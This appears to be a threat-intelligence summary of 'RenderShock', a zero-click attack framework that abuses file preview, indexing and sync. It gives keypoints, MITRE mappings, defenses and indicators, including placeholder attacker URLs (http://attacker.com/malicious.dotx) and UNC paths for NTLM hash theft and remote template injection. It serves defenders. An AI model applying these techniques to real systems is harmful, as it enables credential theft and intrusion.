RenderShock is a zero-click attack framework that exploits passive file preview, indexing, and automation in modern operating systems to execute malicious payloads without user interaction. It leverages trusted system features to perform reconnaissance, credential theft, remote code execution, and persistence, posing significant stealth and detection challenges. #RenderShock #NTLMLeak #RemoteTemplateInjection
Keypoints
- RenderShock exploits passive execution surfaces such as file preview panes, metadata indexers, antivirus scans, and cloud sync tools to trigger payloads without user clicks.
- Payloads include foundational types like PDFs with external references and .lnk files with UNC paths, as well as advanced zero-click triggers like polyglot files and remote template injection in Office documents.
- Delivery methods involve placing malicious files in shared mailboxes, cloud drives, USB drops, and helpdesk uploads where systems automatically process them.
- The attack chain includes reconnaissance via NTLM hash leaks, remote code execution through macros or PowerShell, persistence via auto-start files, and lateral movement using harvested credentials.
- RenderShock uses evasion techniques such as mixing file formats, delayed execution, sandbox checks, and network traffic blending to avoid detection by AV, EDR, and network monitoring.
- Recommended defenses include disabling preview features, restricting outbound SMB traffic, sandboxing file processing pipelines, behavioural monitoring, and deploying deception tactics like decoy files.
- Real-world precedents include exploits used by APT28, Darktrace red team, and documented vulnerabilities in Office and macOS preview engines validating RenderShockβs techniques.
MITRE Techniques
- [T1203 ] Exploitation for Client Execution β via passive rendering of malicious files triggering code execution without user clicks.
- [T1059.001 ] Command and Scripting Interpreter: PowerShell β used for reverse shell payloads triggered by .lnk files or macros.
- [T1204.002 ] User Execution: Malicious File β activated by preview mechanisms rather than explicit user actions.
- [T1187 ] Forced Authentication β leveraging UNC paths in previewed documents or .lnk files to harvest NTLM hashes (ββ¦embedded UNC icon paths cause SMB authentication attemptsβ¦β).
- [T1557.001 ] Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay β enabling relay of harvested NTLM credentials.
- [T1016 ] System Network Configuration Discovery β achieved via passive beaconing through file previews and metadata extraction.
- [T1082 ] System Information Discovery β reconnaissance of host and user details from preview-triggered authentication or callbacks.
- [T1547.009 ] Shortcut Modification β use of .lnk or desktop.ini files for auto-execution persistence.
- [T1037.001 ] Boot or Logon Initialization Scripts β employing LaunchAgents and similar mechanisms for persistence.
- [T1021.002 ] Remote Services: SMB/Windows Admin Shares β lateral movement using harvested credentials.
- [T1005 ] Data from Local System β collection of metadata and clipboard contents from compromised endpoints.
- [T1055.013 ] Process Injection: PowerShell β for delivering reverse shell payloads covertly.
- [T1071.001 ] Application Layer Protocol: Web β HTTP/S used for C2 beaconing and shell transport.
- [T1499.004 ] Endpoint Denial of Service: Application or Service Crash β induced by malformed EXIF or corrupted file structures.
Indicators of Compromise
- [File Hashes] Malicious documents and payloads β examples include fpdf-generated PDF with external SMB image, and ZIP archives containing crafted .lnk files for NTLM hash leakage.
- [File Names] Exploit delivery files β Q3-Financials.lnk (malicious shortcut), recon.pdf (SMB beacon PDF), malicious.dotx (remote template injection), beacon.png (polyglot PNG+HTML file).
- [IP Addresses] Attacker SMB server used for capturing NTLMv2 hashes β e.g., Kali Linux IP running Responder tool.
- [Domains/URLs] Malicious resource locations β http://attacker/shell, http://attacker.com/malicious.dotx for remote template retrieval and payload hosting.
- [UNC Paths] Remote icon or template references triggering forced authentication β attackericon.ico, attackericonsmalicious.dll.
Read more: https://www.cyfirma.com/research/rendershock-weaponizing-trust-in-file-rendering-pipelines/